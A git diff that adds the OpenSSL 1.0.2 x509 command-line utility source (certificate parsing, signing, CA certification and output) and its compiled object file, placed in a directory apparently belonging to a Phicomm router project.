+            if (!(objtmp = OBJ_txt2obj(*(++argv), 0))) {
+                BIO_printf(bio_err, "Invalid trust object value %s\n", *argv);
+                goto bad;
+            }
+            if (!trust)
+                trust = sk_ASN1_OBJECT_new_null();
+            sk_ASN1_OBJECT_push(trust, objtmp);
+            trustout = 1;
+        } else if (strcmp(*argv, "-addreject") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!(objtmp = OBJ_txt2obj(*(++argv), 0))) {
+                BIO_printf(bio_err,
+                           "Invalid reject object value %s\n", *argv);
+                goto bad;
+            }
+            if (!reject)
+                reject = sk_ASN1_OBJECT_new_null();
+            sk_ASN1_OBJECT_push(reject, objtmp);
+            trustout = 1;
+        } else if (strcmp(*argv, "-setalias") == 0) {
+            if (--argc < 1)
+                goto bad;
+            alias = *(++argv);
+            trustout = 1;
+        } else if (strcmp(*argv, "-certopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!set_cert_ex(&certflag, *(++argv)))
+                goto bad;
+        } else if (strcmp(*argv, "-nameopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!set_name_ex(&nmflag, *(++argv)))
+                goto bad;
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+#endif
+        else if (strcmp(*argv, "-C") == 0)
+            C = ++num;
+        else if (strcmp(*argv, "-email") == 0)
+            email = ++num;
+        else if (strcmp(*argv, "-ocsp_uri") == 0)
+            ocsp_uri = ++num;
+        else if (strcmp(*argv, "-serial") == 0)
+            serial = ++num;
+        else if (strcmp(*argv, "-next_serial") == 0)
+            next_serial = ++num;
+        else if (strcmp(*argv, "-modulus") == 0)
+            modulus = ++num;
+        else if (strcmp(*argv, "-pubkey") == 0)
+            pubkey = ++num;
+        else if (strcmp(*argv, "-x509toreq") == 0)
+            x509req = ++num;
+        else if (strcmp(*argv, "-text") == 0)
+            text = ++num;
+        else if (strcmp(*argv, "-hash") == 0
+                 || strcmp(*argv, "-subject_hash") == 0)
+            subject_hash = ++num;
+#ifndef OPENSSL_NO_MD5
+        else if (strcmp(*argv, "-subject_hash_old") == 0)
+            subject_hash_old = ++num;
+#endif
+        else if (strcmp(*argv, "-issuer_hash") == 0)
+            issuer_hash = ++num;
+#ifndef OPENSSL_NO_MD5
+        else if (strcmp(*argv, "-issuer_hash_old") == 0)
+            issuer_hash_old = ++num;
+#endif
+        else if (strcmp(*argv, "-subject") == 0)
+            subject = ++num;
+        else if (strcmp(*argv, "-issuer") == 0)
+            issuer = ++num;
+        else if (strcmp(*argv, "-fingerprint") == 0)
+            fingerprint = ++num;
+        else if (strcmp(*argv, "-dates") == 0) {
+            startdate = ++num;
+            enddate = ++num;
+        } else if (strcmp(*argv, "-purpose") == 0)
+            pprint = ++num;
+        else if (strcmp(*argv, "-startdate") == 0)
+            startdate = ++num;
+        else if (strcmp(*argv, "-enddate") == 0)
+            enddate = ++num;
+        else if (strcmp(*argv, "-checkend") == 0) {
+            if (--argc < 1)
+                goto bad;
+            checkoffset = atoi(*(++argv));
+            checkend = 1;
+        } else if (strcmp(*argv, "-checkhost") == 0) {
+            if (--argc < 1)
+                goto bad;
+            checkhost = *(++argv);
+        } else if (strcmp(*argv, "-checkemail") == 0) {
+            if (--argc < 1)
+                goto bad;
+            checkemail = *(++argv);
+        } else if (strcmp(*argv, "-checkip") == 0) {
+            if (--argc < 1)
+                goto bad;
+            checkip = *(++argv);
+        } else if (strcmp(*argv, "-noout") == 0)
+            noout = ++num;
+        else if (strcmp(*argv, "-trustout") == 0)
+            trustout = 1;
+        else if (strcmp(*argv, "-clrtrust") == 0)
+            clrtrust = ++num;
+        else if (strcmp(*argv, "-clrreject") == 0)
+            clrreject = ++num;
+        else if (strcmp(*argv, "-alias") == 0)
+            aliasout = ++num;
+        else if (strcmp(*argv, "-CAcreateserial") == 0)
+            CA_createserial = ++num;
+        else if (strcmp(*argv, "-clrext") == 0)
+            clrext = 1;
+#if 1                           /* stay backwards-compatible with 0.9.5; this
+                                 * should go away soon */
+        else if (strcmp(*argv, "-crlext") == 0) {
+            BIO_printf(bio_err, "use -clrext instead of -crlext\n");
+            clrext = 1;
+        }
+#endif
+        else if (strcmp(*argv, "-ocspid") == 0)
+            ocspid = ++num;
+        else if (strcmp(*argv, "-badsig") == 0)
+            badsig = 1;
+        else if ((md_alg = EVP_get_digestbyname(*argv + 1))) {
+            /* ok */
+            digest = md_alg;
+        } else {
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+ bad:
+        for (pp = x509_usage; (*pp != NULL); pp++)
+            BIO_printf(bio_err, "%s", *pp);
+        goto end;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    if (need_rand)
+        app_RAND_load_file(NULL, bio_err, 0);
+
+    ERR_load_crypto_strings();
+
+    if (!app_passwd(bio_err, passargin, NULL, &passin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+    if (!X509_STORE_set_default_paths(ctx)) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (fkeyfile) {
+        fkey = load_pubkey(bio_err, fkeyfile, keyformat, 0,
+                           NULL, e, "Forced key");
+        if (fkey == NULL)
+            goto end;
+    }
+
+    if ((CAkeyfile == NULL) && (CA_flag) && (CAformat == FORMAT_PEM)) {
+        CAkeyfile = CAfile;
+    } else if ((CA_flag) && (CAkeyfile == NULL)) {
+        BIO_printf(bio_err,
+                   "need to specify a CAkey if using the CA command\n");
+        goto end;
+    }
+
+    if (extfile) {
+        long errorline = -1;
+        X509V3_CTX ctx2;
+        extconf = NCONF_new(NULL);
+        if (!NCONF_load(extconf, extfile, &errorline)) {
+            if (errorline <= 0)
+                BIO_printf(bio_err,
+                           "error loading the config file '%s'\n", extfile);
+            else
+                BIO_printf(bio_err,
+                           "error on line %ld of config file '%s'\n",
+                           errorline, extfile);
+            goto end;
+        }
+        if (!extsect) {
+            extsect = NCONF_get_string(extconf, "default", "extensions");
+            if (!extsect) {
+                ERR_clear_error();
+                extsect = "default";
+            }
+        }
+        X509V3_set_ctx_test(&ctx2);
+        X509V3_set_nconf(&ctx2, extconf);
+        if (!X509V3_EXT_add_nconf(extconf, &ctx2, extsect, NULL)) {
+            BIO_printf(bio_err,
+                       "Error Loading extension section %s\n", extsect);
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+
+    if (reqfile) {
+        EVP_PKEY *pkey;
+        BIO *in;
+
+        if (!sign_flag && !CA_flag) {
+            BIO_printf(bio_err, "We need a private key to sign with\n");
+            goto end;
+        }
+        in = BIO_new(BIO_s_file());
+        if (in == NULL) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+        if (infile == NULL)
+            BIO_set_fp(in, stdin, BIO_NOCLOSE | BIO_FP_TEXT);
+        else {
+            if (BIO_read_filename(in, infile) <= 0) {
+                perror(infile);
+                BIO_free(in);
+                goto end;
+            }
+        }
+        req = PEM_read_bio_X509_REQ(in, NULL, NULL, NULL);
+        BIO_free(in);
+
+        if (req == NULL) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+
+        if ((req->req_info == NULL) ||
+            (req->req_info->pubkey == NULL) ||
+            (req->req_info->pubkey->public_key == NULL) ||
+            (req->req_info->pubkey->public_key->data == NULL)) {
+            BIO_printf(bio_err,
+                       "The certificate request appears to corrupted\n");
+            BIO_printf(bio_err, "It does not contain a public key\n");
+            goto end;
+        }
+        if ((pkey = X509_REQ_get_pubkey(req)) == NULL) {
+            BIO_printf(bio_err, "error unpacking public key\n");
+            goto end;
+        }
+        i = X509_REQ_verify(req, pkey);
+        EVP_PKEY_free(pkey);
+        if (i < 0) {
+            BIO_printf(bio_err, "Signature verification error\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (i == 0) {
+            BIO_printf(bio_err,
+                       "Signature did not match the certificate request\n");
+            goto end;
+        } else
+            BIO_printf(bio_err, "Signature ok\n");
+
+        print_name(bio_err, "subject=", X509_REQ_get_subject_name(req),
+                   nmflag);
+
+        if ((x = X509_new()) == NULL)
+            goto end;
+
+        if (sno == NULL) {
+            sno = ASN1_INTEGER_new();
+            if (!sno || !rand_serial(NULL, sno))
+                goto end;
+            if (!X509_set_serialNumber(x, sno))
+                goto end;
+            ASN1_INTEGER_free(sno);
+            sno = NULL;
+        } else if (!X509_set_serialNumber(x, sno))
+            goto end;
+
+        if (!X509_set_issuer_name(x, req->req_info->subject))
+            goto end;
+        if (!X509_set_subject_name(x, req->req_info->subject))
+            goto end;
+
+        X509_gmtime_adj(X509_get_notBefore(x), 0);
+        X509_time_adj_ex(X509_get_notAfter(x), days, 0, NULL);
+        if (fkey)
+            X509_set_pubkey(x, fkey);
+        else {
+            pkey = X509_REQ_get_pubkey(req);
+            X509_set_pubkey(x, pkey);
+            EVP_PKEY_free(pkey);
+        }
+    } else
+        x = load_cert(bio_err, infile, informat, NULL, e, "Certificate");
+
+    if (x == NULL)
+        goto end;
+    if (CA_flag) {
+        xca = load_cert(bio_err, CAfile, CAformat, NULL, e, "CA Certificate");
+        if (xca == NULL)
+            goto end;
+    }
+
+    if (!noout || text || next_serial) {
+        OBJ_create("2.99999.3", "SET.ex3", "SET x509v3 extension 3");
+
+        out = BIO_new(BIO_s_file());
+        if (out == NULL) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (outfile == NULL) {
+            BIO_set_fp(out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+            {
+                BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+                out = BIO_push(tmpbio, out);
+            }
+#endif
+        } else {
+            if (BIO_write_filename(out, outfile) <= 0) {
+                perror(outfile);
+                goto end;
+            }
+        }
+    }
+
+    if (alias)
+        X509_alias_set1(x, (unsigned char *)alias, -1);
+
+    if (clrtrust)
+        X509_trust_clear(x);
+    if (clrreject)
+        X509_reject_clear(x);
+
+    if (trust) {
+        for (i = 0; i < sk_ASN1_OBJECT_num(trust); i++) {
+            objtmp = sk_ASN1_OBJECT_value(trust, i);
+            X509_add1_trust_object(x, objtmp);
+        }
+    }
+
+    if (reject) {
+        for (i = 0; i < sk_ASN1_OBJECT_num(reject); i++) {
+            objtmp = sk_ASN1_OBJECT_value(reject, i);
+            X509_add1_reject_object(x, objtmp);
+        }
+    }
+
+    if (num) {
+        for (i = 1; i <= num; i++) {
+            if (issuer == i) {
+                print_name(STDout, "issuer= ",
+                           X509_get_issuer_name(x), nmflag);
+            } else if (subject == i) {
+                print_name(STDout, "subject= ",
+                           X509_get_subject_name(x), nmflag);
+            } else if (serial == i) {
+                BIO_printf(STDout, "serial=");
+                i2a_ASN1_INTEGER(STDout, X509_get_serialNumber(x));
+                BIO_printf(STDout, "\n");
+            } else if (next_serial == i) {
+                BIGNUM *bnser;
+                ASN1_INTEGER *ser;
+                ser = X509_get_serialNumber(x);
+                bnser = ASN1_INTEGER_to_BN(ser, NULL);
+                if (!bnser)
+                    goto end;
+                if (!BN_add_word(bnser, 1))
+                    goto end;
+                ser = BN_to_ASN1_INTEGER(bnser, NULL);
+                if (!ser)
+                    goto end;
+                BN_free(bnser);
+                i2a_ASN1_INTEGER(out, ser);
+                ASN1_INTEGER_free(ser);
+                BIO_puts(out, "\n");
+            } else if ((email == i) || (ocsp_uri == i)) {
+                int j;
+                STACK_OF(OPENSSL_STRING) *emlst;
+                if (email == i)
+                    emlst = X509_get1_email(x);
+                else
+                    emlst = X509_get1_ocsp(x);
+                for (j = 0; j < sk_OPENSSL_STRING_num(emlst); j++)
+                    BIO_printf(STDout, "%s\n",
+                               sk_OPENSSL_STRING_value(emlst, j));
+                X509_email_free(emlst);
+            } else if (aliasout == i) {
+                unsigned char *alstr;
+                alstr = X509_alias_get0(x, NULL);
+                if (alstr)
+                    BIO_printf(STDout, "%s\n", alstr);
+                else
+                    BIO_puts(STDout, "<No Alias>\n");
+            } else if (subject_hash == i) {
+                BIO_printf(STDout, "%08lx\n", X509_subject_name_hash(x));
+            }
+#ifndef OPENSSL_NO_MD5
+            else if (subject_hash_old == i) {
+                BIO_printf(STDout, "%08lx\n", X509_subject_name_hash_old(x));
+            }
+#endif
+            else if (issuer_hash == i) {
+                BIO_printf(STDout, "%08lx\n", X509_issuer_name_hash(x));
+            }
+#ifndef OPENSSL_NO_MD5
+            else if (issuer_hash_old == i) {
+                BIO_printf(STDout, "%08lx\n", X509_issuer_name_hash_old(x));
+            }
+#endif
+            else if (pprint == i) {
+                X509_PURPOSE *ptmp;
+                int j;
+                BIO_printf(STDout, "Certificate purposes:\n");
+                for (j = 0; j < X509_PURPOSE_get_count(); j++) {
+                    ptmp = X509_PURPOSE_get0(j);
+                    purpose_print(STDout, x, ptmp);
+                }
+            } else if (modulus == i) {
+                EVP_PKEY *pkey;
+
+                pkey = X509_get_pubkey(x);
+                if (pkey == NULL) {
+                    BIO_printf(bio_err, "Modulus=unavailable\n");
+                    ERR_print_errors(bio_err);
+                    goto end;
+                }
+                BIO_printf(STDout, "Modulus=");
+#ifndef OPENSSL_NO_RSA
+                if (pkey->type == EVP_PKEY_RSA)
+                    BN_print(STDout, pkey->pkey.rsa->n);
+                else
+#endif
+#ifndef OPENSSL_NO_DSA
+                if (pkey->type == EVP_PKEY_DSA)
+                    BN_print(STDout, pkey->pkey.dsa->pub_key);
+                else
+#endif
+                    BIO_printf(STDout, "Wrong Algorithm type");
+                BIO_printf(STDout, "\n");
+                EVP_PKEY_free(pkey);
+            } else if (pubkey == i) {
+                EVP_PKEY *pkey;
+
+                pkey = X509_get_pubkey(x);
+                if (pkey == NULL) {
+                    BIO_printf(bio_err, "Error getting public key\n");
+                    ERR_print_errors(bio_err);
+                    goto end;
+                }
+                PEM_write_bio_PUBKEY(STDout, pkey);
+                EVP_PKEY_free(pkey);
+            } else if (C == i) {
+                unsigned char *d;
+                char *m;
+                int y, z;
+
+                X509_NAME_oneline(X509_get_subject_name(x), buf, sizeof buf);
+                BIO_printf(STDout, "/* subject:%s */\n", buf);
+                m = X509_NAME_oneline(X509_get_issuer_name(x), buf,
+                                      sizeof buf);
+                BIO_printf(STDout, "/* issuer :%s */\n", buf);
+
+                z = i2d_X509(x, NULL);
+                m = OPENSSL_malloc(z);
+
+                d = (unsigned char *)m;
+                z = i2d_X509_NAME(X509_get_subject_name(x), &d);
+                BIO_printf(STDout, "unsigned char XXX_subject_name[%d]={\n",
+                           z);
+                d = (unsigned char *)m;
+                for (y = 0; y < z; y++) {
+                    BIO_printf(STDout, "0x%02X,", d[y]);
+                    if ((y & 0x0f) == 0x0f)
+                        BIO_printf(STDout, "\n");
+                }
+                if (y % 16 != 0)
+                    BIO_printf(STDout, "\n");
+                BIO_printf(STDout, "};\n");
+
+                z = i2d_X509_PUBKEY(X509_get_X509_PUBKEY(x), &d);
+                BIO_printf(STDout, "unsigned char XXX_public_key[%d]={\n", z);
+                d = (unsigned char *)m;
+                for (y = 0; y < z; y++) {
+                    BIO_printf(STDout, "0x%02X,", d[y]);
+                    if ((y & 0x0f) == 0x0f)
+                        BIO_printf(STDout, "\n");
+                }
+                if (y % 16 != 0)
+                    BIO_printf(STDout, "\n");
+                BIO_printf(STDout, "};\n");
+
+                z = i2d_X509(x, &d);
+                BIO_printf(STDout, "unsigned char XXX_certificate[%d]={\n",
+                           z);
+                d = (unsigned char *)m;
+                for (y = 0; y < z; y++) {
+                    BIO_printf(STDout, "0x%02X,", d[y]);
+                    if ((y & 0x0f) == 0x0f)
+                        BIO_printf(STDout, "\n");
+                }
+                if (y % 16 != 0)
+                    BIO_printf(STDout, "\n");
+                BIO_printf(STDout, "};\n");
+
+                OPENSSL_free(m);
+            } else if (text == i) {
+                X509_print_ex(STDout, x, nmflag, certflag);
+            } else if (startdate == i) {
+                BIO_puts(STDout, "notBefore=");
+                ASN1_TIME_print(STDout, X509_get_notBefore(x));
+                BIO_puts(STDout, "\n");
+            } else if (enddate == i) {
+                BIO_puts(STDout, "notAfter=");
+                ASN1_TIME_print(STDout, X509_get_notAfter(x));
+                BIO_puts(STDout, "\n");
+            } else if (fingerprint == i) {
+                int j;
+                unsigned int n;
+                unsigned char md[EVP_MAX_MD_SIZE];
+                const EVP_MD *fdig = digest;
+
+                if (!fdig)
+                    fdig = EVP_sha1();
+
+                if (!X509_digest(x, fdig, md, &n)) {
+                    BIO_printf(bio_err, "out of memory\n");
+                    goto end;
+                }
+                BIO_printf(STDout, "%s Fingerprint=",
+                           OBJ_nid2sn(EVP_MD_type(fdig)));
+                for (j = 0; j < (int)n; j++) {
+                    BIO_printf(STDout, "%02X%c", md[j], (j + 1 == (int)n)
+                               ? '\n' : ':');
+                }
+            }
+
+            /* should be in the library */
+            else if ((sign_flag == i) && (x509req == 0)) {
+                BIO_printf(bio_err, "Getting Private key\n");
+                if (Upkey == NULL) {
+                    Upkey = load_key(bio_err,
+                                     keyfile, keyformat, 0,
+                                     passin, e, "Private key");
+                    if (Upkey == NULL)
+                        goto end;
+                }
+
+                assert(need_rand);
+                if (!sign(x, Upkey, days, clrext, digest, extconf, extsect))
+                    goto end;
+            } else if (CA_flag == i) {
+                BIO_printf(bio_err, "Getting CA Private Key\n");
+                if (CAkeyfile != NULL) {
+                    CApkey = load_key(bio_err,
+                                      CAkeyfile, CAkeyformat,
+                                      0, passin, e, "CA Private Key");
+                    if (CApkey == NULL)
+                        goto end;
+                }
+
+                assert(need_rand);
+                if (!x509_certify(ctx, CAfile, digest, x, xca,
+                                  CApkey, sigopts,
+                                  CAserial, CA_createserial, days, clrext,
+                                  extconf, extsect, sno))
+                    goto end;
+            } else if (x509req == i) {
+                EVP_PKEY *pk;
+
+                BIO_printf(bio_err, "Getting request Private Key\n");
+                if (keyfile == NULL) {
+                    BIO_printf(bio_err, "no request key file specified\n");
+                    goto end;
+                } else {
+                    pk = load_key(bio_err,
+                                  keyfile, keyformat, 0,
+                                  passin, e, "request key");
+                    if (pk == NULL)
+                        goto end;
+                }
+
+                BIO_printf(bio_err, "Generating certificate request\n");
+
+                rq = X509_to_X509_REQ(x, pk, digest);
+                EVP_PKEY_free(pk);
+                if (rq == NULL) {
+                    ERR_print_errors(bio_err);
+                    goto end;
+                }
+                if (!noout) {
+                    X509_REQ_print(out, rq);
+                    PEM_write_bio_X509_REQ(out, rq);
+                }
+                noout = 1;
+            } else if (ocspid == i) {
+                X509_ocspid_print(out, x);
+            }
+        }
+    }
+
+    if (checkend) {
+        time_t tcheck = time(NULL) + checkoffset;
+
+        if (X509_cmp_time(X509_get_notAfter(x), &tcheck) < 0) {
+            BIO_printf(out, "Certificate will expire\n");
+            ret = 1;
+        } else {
+            BIO_printf(out, "Certificate will not expire\n");
+            ret = 0;
+        }
+        goto end;
+    }
+
+    print_cert_checks(STDout, x, checkhost, checkemail, checkip);
+
+    if (noout) {
+        ret = 0;
+        goto end;
+    }
+
+    if (badsig)
+        x->signature->data[x->signature->length - 1] ^= 0x1;
+
+    if (outformat == FORMAT_ASN1)
+        i = i2d_X509_bio(out, x);
+    else if (outformat == FORMAT_PEM) {
+        if (trustout)
+            i = PEM_write_bio_X509_AUX(out, x);
+        else
+            i = PEM_write_bio_X509(out, x);
+    } else if (outformat == FORMAT_NETSCAPE) {
+        NETSCAPE_X509 nx;
+        ASN1_OCTET_STRING hdr;
+
+        hdr.data = (unsigned char *)NETSCAPE_CERT_HDR;
+        hdr.length = strlen(NETSCAPE_CERT_HDR);
+        nx.header = &hdr;
+        nx.cert = x;
+
+        i = ASN1_item_i2d_bio(ASN1_ITEM_rptr(NETSCAPE_X509), out, &nx);
+    } else {
+        BIO_printf(bio_err, "bad output format specified for outfile\n");
+        goto end;
+    }
+    if (!i) {
+        BIO_printf(bio_err, "unable to write certificate\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    ret = 0;
+ end:
+    if (need_rand)
+        app_RAND_write_file(NULL, bio_err);
+    OBJ_cleanup();
+    NCONF_free(extconf);
+    BIO_free_all(out);
+    BIO_free_all(STDout);
+    X509_STORE_free(ctx);
+    X509_REQ_free(req);
+    X509_free(x);
+    X509_free(xca);
+    EVP_PKEY_free(Upkey);
+    EVP_PKEY_free(CApkey);
+    EVP_PKEY_free(fkey);
+    if (sigopts)
+        sk_OPENSSL_STRING_free(sigopts);
+    X509_REQ_free(rq);
+    ASN1_INTEGER_free(sno);
+    sk_ASN1_OBJECT_pop_free(trust, ASN1_OBJECT_free);
+    sk_ASN1_OBJECT_pop_free(reject, ASN1_OBJECT_free);
+    if (passin)
+        OPENSSL_free(passin);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static ASN1_INTEGER *x509_load_serial(char *CAfile, char *serialfile,
+                                      int create)
+{
+    char *buf = NULL, *p;
+    ASN1_INTEGER *bs = NULL;
+    BIGNUM *serial = NULL;
+    size_t len;
+
+    len = ((serialfile == NULL)
+           ? (strlen(CAfile) + strlen(POSTFIX) + 1)
+           : (strlen(serialfile))) + 1;
+    buf = OPENSSL_malloc(len);
+    if (buf == NULL) {
+        BIO_printf(bio_err, "out of mem\n");
+        goto end;
+    }
+    if (serialfile == NULL) {
+        BUF_strlcpy(buf, CAfile, len);
+        for (p = buf; *p; p++)
+            if (*p == '.') {
+                *p = '\0';
+                break;
+            }
+        BUF_strlcat(buf, POSTFIX, len);
+    } else
+        BUF_strlcpy(buf, serialfile, len);
+
+    serial = load_serial(buf, create, NULL);
+    if (serial == NULL)
+        goto end;
+
+    if (!BN_add_word(serial, 1)) {
+        BIO_printf(bio_err, "add_word failure\n");
+        goto end;
+    }
+
+    if (!save_serial(buf, NULL, serial, &bs))
+        goto end;
+
+ end:
+    if (buf)
+        OPENSSL_free(buf);
+    BN_free(serial);
+    return bs;
+}
+
+static int x509_certify(X509_STORE *ctx, char *CAfile, const EVP_MD *digest,
+                        X509 *x, X509 *xca, EVP_PKEY *pkey,
+                        STACK_OF(OPENSSL_STRING) *sigopts,
+                        char *serialfile, int create,
+                        int days, int clrext, CONF *conf, char *section,
+                        ASN1_INTEGER *sno)
+{
+    int ret = 0;
+    ASN1_INTEGER *bs = NULL;
+    X509_STORE_CTX xsc;
+    EVP_PKEY *upkey;
+
+    upkey = X509_get_pubkey(xca);
+    EVP_PKEY_copy_parameters(upkey, pkey);
+    EVP_PKEY_free(upkey);
+
+    if (!X509_STORE_CTX_init(&xsc, ctx, x, NULL)) {
+        BIO_printf(bio_err, "Error initialising X509 store\n");
+        goto end;
+    }
+    if (sno)
+        bs = sno;
+    else if (!(bs = x509_load_serial(CAfile, serialfile, create)))
+        goto end;
+
+/*      if (!X509_STORE_add_cert(ctx,x)) goto end;*/
+
+    /*
+     * NOTE: this certificate can/should be self signed, unless it was a
+     * certificate request in which case it is not.
+     */
+    X509_STORE_CTX_set_cert(&xsc, x);
+    X509_STORE_CTX_set_flags(&xsc, X509_V_FLAG_CHECK_SS_SIGNATURE);
+    if (!reqfile && X509_verify_cert(&xsc) <= 0)
+        goto end;
+
+    if (!X509_check_private_key(xca, pkey)) {
+        BIO_printf(bio_err,
+                   "CA certificate and CA private key do not match\n");
+        goto end;
+    }
+
+    if (!X509_set_issuer_name(x, X509_get_subject_name(xca)))
+        goto end;
+    if (!X509_set_serialNumber(x, bs))
+        goto end;
+
+    if (X509_gmtime_adj(X509_get_notBefore(x), 0L) == NULL)
+        goto end;
+
+    /* hardwired expired */
+    if (X509_time_adj_ex(X509_get_notAfter(x), days, 0, NULL) == NULL)
+        goto end;
+
+    if (clrext) {
+        while (X509_get_ext_count(x) > 0)
+            X509_delete_ext(x, 0);
+    }
+
+    if (conf) {
+        X509V3_CTX ctx2;
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+        X509_set_version(x, force_version);
+#else
+        X509_set_version(x, 2); /* version 3 certificate */
+#endif
+        X509V3_set_ctx(&ctx2, xca, x, NULL, NULL, 0);
+        X509V3_set_nconf(&ctx2, conf);
+        if (!X509V3_EXT_add_nconf(conf, &ctx2, section, x))
+            goto end;
+    }
+
+    if (!do_X509_sign(bio_err, x, pkey, digest, sigopts))
+        goto end;
+    ret = 1;
+ end:
+    X509_STORE_CTX_cleanup(&xsc);
+    if (!ret)
+        ERR_print_errors(bio_err);
+    if (!sno)
+        ASN1_INTEGER_free(bs);
+    return ret;
+}
+
+static int MS_CALLBACK callb(int ok, X509_STORE_CTX *ctx)
+{
+    int err;
+    X509 *err_cert;
+
+    /*
+     * it is ok to use a self signed certificate This case will catch both
+     * the initial ok == 0 and the final ok == 1 calls to this function
+     */
+    err = X509_STORE_CTX_get_error(ctx);
+    if (err == X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT)
+        return 1;
+
+    /*
+     * BAD we should have gotten an error.  Normally if everything worked
+     * X509_STORE_CTX_get_error(ctx) will still be set to
+     * DEPTH_ZERO_SELF_....
+     */
+    if (ok) {
+        BIO_printf(bio_err,
+                   "error with certificate to be certified - should be self signed\n");
+        return 0;
+    } else {
+        err_cert = X509_STORE_CTX_get_current_cert(ctx);
+        print_name(bio_err, NULL, X509_get_subject_name(err_cert), 0);
+        BIO_printf(bio_err,
+                   "error with certificate - error %d at depth %d\n%s\n", err,
+                   X509_STORE_CTX_get_error_depth(ctx),
+                   X509_verify_cert_error_string(err));
+        return 1;
+    }
+}
+
+/* self sign */
+static int sign(X509 *x, EVP_PKEY *pkey, int days, int clrext,
+                const EVP_MD *digest, CONF *conf, char *section)
+{
+
+    EVP_PKEY *pktmp;
+
+    pktmp = X509_get_pubkey(x);
+    EVP_PKEY_copy_parameters(pktmp, pkey);
+    EVP_PKEY_save_parameters(pktmp, 1);
+    EVP_PKEY_free(pktmp);
+
+    if (!X509_set_issuer_name(x, X509_get_subject_name(x)))
+        goto err;
+    if (X509_gmtime_adj(X509_get_notBefore(x), 0) == NULL)
+        goto err;
+
+    /* Lets just make it 12:00am GMT, Jan 1 1970 */
+    /* memcpy(x->cert_info->validity->notBefore,"700101120000Z",13); */
+    /* 28 days to be certified */
+
+    if (X509_gmtime_adj(X509_get_notAfter(x), (long)60 * 60 * 24 * days) ==
+        NULL)
+        goto err;
+
+    if (!X509_set_pubkey(x, pkey))
+        goto err;
+    if (clrext) {
+        while (X509_get_ext_count(x) > 0)
+            X509_delete_ext(x, 0);
+    }
+    if (conf) {
+        X509V3_CTX ctx;
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+        X509_set_version(x, force_version);
+#else
+        X509_set_version(x, 2); /* version 3 certificate */
+#endif
+        X509V3_set_ctx(&ctx, x, x, NULL, NULL, 0);
+        X509V3_set_nconf(&ctx, conf);
+        if (!X509V3_EXT_add_nconf(conf, &ctx, section, x))
+            goto err;
+    }
+    if (!X509_sign(x, pkey, digest))
+        goto err;
+    return 1;
+ err:
+    ERR_print_errors(bio_err);
+    return 0;
+}
+
+static int purpose_print(BIO *bio, X509 *cert, X509_PURPOSE *pt)
+{
+    int id, i, idret;
+    char *pname;
+    id = X509_PURPOSE_get_id(pt);
+    pname = X509_PURPOSE_get0_name(pt);
+    for (i = 0; i < 2; i++) {
+        idret = X509_check_purpose(cert, id, i);
+        BIO_printf(bio, "%s%s : ", pname, i ? " CA" : "");
+        if (idret == 1)
+            BIO_printf(bio, "Yes\n");
+        else if (idret == 0)
+            BIO_printf(bio, "No\n");
+        else
+            BIO_printf(bio, "Yes (WARNING code=%d)\n", idret);
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/x509.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/x509.o
new file mode 100644
index 0000000000000000000000000000000000000000..0c7946705b156c02b4f4077f242a7e98dbad5e73
GIT binary patch
literal 43584
zcmeI5eRx#G+5Zm&G)7ENQBhHj8Z;sa+3*%rYyt!pjga!95z!?i8xl#fF}n+)TBRjX
zV~E<SmB&Y|we_vqmbTVMk!lnyP^-08TdLOD)+%d!;i+$^)I9e+bI+b{COgvW_xtC$
zuHWxm*JkH@&Ufyax#ylabIzXKTv<^$XXub2p4o<YXL-S%q4a)FkS<fnGVf4tr1wGI
z@t>71UJ~y5Xi?Ya;jT}@>)#o<n~#@wZF__bm9O7-SYmDGD~Y4S-81+=xMvE#g?g1N
z)Z4c#-1WXnhr71xcP$L<41FB#dP<>rwfjW!ez<FPezw}F?55Q0uD^-lt|teYR>g<c
zZyR~xMdi!3s*0XpeqQ+!s&3c6o;ZZ+uqfR1!Q))X@HgJso8@_R;qGDM3V6S(BY!u6
zP;Yp9NB(kg2&Wq$-74wr!zqi}bRE~Lc6!Mpq++3urS3{M5O((Fbu2lVN|ZKh>AbFA
zNtW69?P1o`vZiNB&lmmu<fi^-!|S(dCv2acKY`1x2=!Nl-sLKmK^03OU2Lk`kzXAo
zdsW3fk1}qQWSDFgbD9&SCedILt(+kFguqBakjxK~evrJ6vK+6oy~^2XBMV~!!4?gf
zjt=O^AbDpX7!lB20nHBRZ2^5TNDd1GCd8?<eSu(ako+)6J|8516C`&8$vr{xogk_D
zk9MhuZ9>_dKBqYm)`^b%8#qB5cilBQsnY8py(yiZoj;P(q<w?lC`3K7HCnxQ<Ue9i
zNB)B*NkfE>a*@mFT_vhHK_*`3ciQM!0l%}T%p|Hf(fMxPbx-DaUS;=5GPo+c-cn8L
z>`flq|7>2z6Ld7(eOY#8Ppu9}9-e&@2dnd0{jEW2UDe92zo+K&F+DjzA;)vJr5Unu
zWBaxb&XA{vBX@S{bNV}2p-dh)$RznOmFTDOHK-0Ja2@_|klj$-2dT1*c~0j%cX6Ke
